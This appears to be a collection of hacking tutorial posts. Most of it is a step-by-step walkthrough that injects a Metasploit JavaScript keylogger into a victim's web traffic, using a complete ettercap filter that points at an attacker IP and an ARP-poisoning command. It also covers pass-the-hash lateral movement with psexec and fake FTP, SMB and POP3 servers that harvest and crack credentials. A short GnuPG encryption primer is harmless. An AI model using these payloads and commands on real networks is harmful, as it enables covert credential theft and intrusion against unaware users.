Injecting keylogger

Injecting keylogger

The Used Tools;
metasploit auxiliary module (http_javascript_keylogger)
ettercap

DEMO,

1- Run "http_javascript_keylogger" module

msf > use auxiliary/server/capture/http_javascript_keylogger

This auxiliary module create javascript which could be injected in web page to record the keys pressed by the user inside this page only, including his login credentials.

After running this module, it would give you a link. To use it, appaend "/anyname.js" , you name it anything you want.
I set URIPATH to "keylogger" ==> This is the link:

http://192.168.45.191:8080/keylogger/anyname.js
http://ip:SRVPORT/URIPATH/anyname.js

By now, you have your javascript link, How to inject it?

you could inject it via XSS or network spoofing.

I'll use ettercap to manipulate (by etterfilter) the wep pages on the network and inject my javacript

2- The filter script used for injection:

if (ip.proto == TCP && ip.dst != '192.168.56.101' && tcp.dst == 80 || tcp.dst == 8080) {

 if (search(DATA.data, "Accept-Encoding")) {

 replace("Accept-Encoding", "Accept-Nothing!");

 }

}

if (ip.proto == TCP && ip.dst != '192.168.56.101' && tcp.src == 80 || tcp.src == 8080) {

 if (search(DATA.data, "<head>")){

 replace("<head>","<head><script src='http://192.168.45.191:8080/keylogger/anything.js'> </script>");

 msg("Keylogger injected :) \n");

 }

 if (search(DATA.data, "<HEAD>")){

 replace("<HEAD>","<BHEAD><SCRIPT SRC='http://192.168.45.191:8080/keylogger/anything.js'> </script>");

 msg("Keylogger injected :) \n");

 }

}

This filter append "<script src='http://192.168.45.191:8080/keylogger/anything.js'> </script>" to "<head>" which make it be loaded imediatly



3- save it as txt file, then compile with etterfilter to binary. This is MUST, because ettercap won't use ascii filter.
Use this command

etterfilter etterkeylogger -o etterkeylogger.ef"

where "etterkeylogger" is the file which contain the filter script and "etterkeylogger.ef" is the output binary file which is used by ettercap

4- The used ettercap command :

root@bt:~# ettercap -T -M arp -F etterkeylogger.ef /192.168.1.1/ /192.168.1.104/ 

where,

-T => for console mode

-M arp => for arp poisoning attack to redirect the traffic to your machine, (don't worry, it then forward the requests to the Web, so the victim won't notice any change)

-F etterkeylogger.ef => is the compiled binary filter script produced by etterfilter

/192.168.1.1/ => target 1 (default gateway)

/192.168.1.104/ = target 2 (victim)

The RESULT

Secure Communication for Dummies

GnuPG [Encryption/Decryption messages]

GnuPG is a tool for secure communication.

GnuPG uses public-key cryptography so that users may communicate securely. In a public-key system, each user has a pair of keys consisting of a private key and a public key. A user's private key is kept secret; it need never be revealed. The public key may be given to anyone with whom the user wants to communicate. GnuPG uses a somewhat more sophisticated scheme in which a user has a primary keypair and then zero or more additional subordinate keypairs. The primary and subordinate keypairs are bundled to facilitate key management and the bundle can often be considered simply as one keypair.

PGP: Pretty Good Privacy (PGP) is a data encryption and decryption computer program that provides cryptographic privacy andauthentication for data communication. PGP is often used for signing, encrypting and decrypting texts, e-mails, files, directories and whole disk partitions to increase the security of e-mail communications. It was created by Phil Zimmermann in 1991.

N.Bs,

• It's a PUBLIC/PRIVATE  key ENCRYPTION/DECRYPTION communication.
• You generate public and private keys by one command.
• You give the public key to others so that they communicate with you and you have your OWN private one.
• Encryption with public keys, Decryption with private keys.
• So, for example, if a SENDER on the other side wants to give you a message or email, he would simply use your public key (that you already EXPORTED to him). you decrypt it with your private key ;)
• Passphrase(password) is used only to decrypt messages by the private key by the receiver(generator).
• The key is exported in a binary format, but this can be inconvenient when the key is to be sent though email or published on a web page. GnuPG therefore supports a command-line option --armor that that causes output to be generated in an ASCII-armored format similar to uuencoded documents. In general, any output from GnuPG, e.g., keys, encrypted documents, and signatures, can be ASCII-armored by adding the --armor option.

DEMOs

The Environment;

backtrack machine to generate the key pair >> GnuPG 

windows machine to >> GPA (GNU Privacy Assistance )

[case one]backtrack is the RECEIVER, Windows is the SENDER

on backtrack;

generating the key

root@bt:~/gpg# gpg --gen-key

root@bt:~/gpg# gpg --list-secret-keys

Exporting the public key;

root@bt:~/gpg# gpg --output eaglepublickey.gpg --export   \\exports it as non-readable binary format

root@bt:~/gpg# gpg --output eaglepublickey.txt --export --armor \\exports it as readable ascii format

This is the key that you give to others so they could message you.

On Windows;

Copy the key from backtrack to windows 

Run "gpg4win" program (right)

Import

Select the files to encrypt: Windows tab >> File Manager (left)

To Decrypt the message;

You have only one private key, so you won't specify it, unlike encryption where you must specify(you would have many public keys)

[Case two]

On Windows (GPA);

keys tab >> new key >> [name: eaglewindows]

Keys tab >> export key >>

On backtrack;

copy the key to backtrack

root@bt:~/gpg# gpg --import /root/Desktop/key
root@bt:~/gpg# gpg --output encryptedmessage.gpg --encrypt --recipient eaglewindows
root@bt:~/gpg# gpg --output encryptedmessage.gpg --encrypt --recipient eaglewindows messagetowindows

On Windows;

Windows tab >> File Manager 

decrypt

put your password

exploit/windows/smb/psexec

Microsoft Windows Authenticated User Code Execution

"This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description."

So all you need is an administrator account credentials

PsExec is a light-weight telnet-replacement that lets you execute processes on remote systems.

e.g:  psexec \\ZEAGLE -u test -p test ipconfig

which execute "ipconfig" command on remote computer "ZEAGLE" with ADMINISTRATOR (must be  administrator ) account "test" and password "test".

One great method with psexec in metasploit is it allows you to enter the password itself, or you can simply just specify the hash values, no need to crack to gain access to the system. Let's think deeply about how we can utilize this attack to further penetrate a network. Lets first say we compromise a system that has an administrator password on the system, we don't need to crack it because psexec allows us to utilize just the hash values, that administrator account is the same on every account within the domain infrastructure. We can now go from system to system without ever having to worry about cracking the password. One important thing to note on this is that if NTLM is only available (for example its a 15+ character password or through GPO they specify NTLM response only), simply replace the ****NOPASSWORD**** with 32 0's for example:

******NOPASSWORD*******:8846f7eaee8fb117ad06bdd830b7586c

Would be replaced by:

00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c

auxiliary/server/capture/XXXX part-1

auxiliary/server/capture/ftp

This module provides a fake FTP service that is designed to capture authentication credentials.
I've used FileZilla for logins

[used FileZilla to pentest login]

auxiliary/server/capture/smb

This module provides a FAKE SMB service that can be used to capture the challenge-response password hashes of SMB client systems.

Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch).

To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.

SMB: Server Message Block (SMB), also known as Common Internet File System (CIFS) used for providing shared access to files, printers, serial ports, and miscellaneous communications between nodes on a network.

http://en.wikipedia.org/wiki/Server_Message_Block

http://oss.sgi.com/LDP/HOWTO/SMB-HOWTO-8.html

To test accessing the fake server and put the password »

smbclient -L [serverip] -U [username]
smbclient -L 192.168.45.1 -U test

To crack the password hash »

john JOHNPWFILE

auxiliary/server/capture/pop3

This module provides a fake POP3 service that is designed to capture authentication credentials.

[used Microsoft Outlook for pentest login]

auxiliary/server/capture/telnet

auxiliary/server/capture/smtp